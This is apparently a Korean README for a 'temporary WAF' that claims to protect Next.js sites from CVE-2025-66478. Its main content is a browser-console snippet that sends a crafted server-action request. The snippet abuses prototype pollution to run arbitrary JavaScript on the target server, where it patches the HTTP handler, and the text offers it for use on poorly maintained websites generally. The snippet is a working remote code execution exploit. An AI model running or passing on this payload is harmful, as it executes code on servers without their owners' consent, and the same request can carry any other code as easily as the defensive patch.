
웹사이트가 제대로 패치될 때까지 안전하게 유지되도록 도와줍시다!
특정 페이로드 시퀀스를 대상으로 하는 간단한 임시 WAF 보호 테스터입니다.
웹사이트가 제대로 패치될 때까지 안전하게 유지되도록 도와줍시다!
특정 페이로드 시그니처가 포함된 요청을 탐지하고 차단하여 CVE-2025-66478로부터 보호합니다. 정상적인 트래픽을 방해하지 않으며, 제대로 유지 관리되지 않는 웹사이트를 구합니다.
재시작 후에는 초기화되므로 영구적인 해결책이 아닙니다
python main.py
python main.py http://example.com/
네, 브라우저 콘솔에서 바로 실행하세요:
const formData = new FormData();
const actionPayload = {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"throw(async()=>{const t=await import(\"node:http\"),e=t.IncomingMessage.prototype.emit;t.IncomingMessage.prototype.emit=function(t,...n){if(\"data\"===t&&n.length>0){const t=this.headers[\"content-type\"]||\"\";if(t.includes(\"multipart\")||t.includes(\"json\")||t.includes(\"text\")){const t=n[0].toString(\"utf8\");if(t.includes('\"then\":\"$1:__proto__:then\"')||t.includes('\"get\":\"$1:constructor:constructor\"')){const t=this.socket._httpMessage;if(t&&!t.headersSent)try{return t.writeHead(500,{\"Content-Type\":\"text/plain; charset=utf-8\",Connection:\"close\",\"X-Powered-By\":\"Next.js\"}),t.end('0:{\"a\":\"$@1\",\"f\":\"\",\"b\":\"cwwYVM2ZWm4vgZG3xVPfk\"}\\n1:E{\"digest\":\"2494231801\"}',(()=>this.destroy())),!1}catch(t){this.destroy()}else this.destroy();return!1}}}return e.apply(this,arguments)}})(),Object.assign(new Error(\"x\"),{digest:\"WAF Installed\"});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
formData.append("0", JSON.stringify(actionPayload));
formData.append("1", '"$@0"');
formData.append("2", "[]");
fetch("/", {
method: "POST",
body: formData,
headers: {
"Next-Action": "x",
}
})
.then(async res => console.log(await res.text()));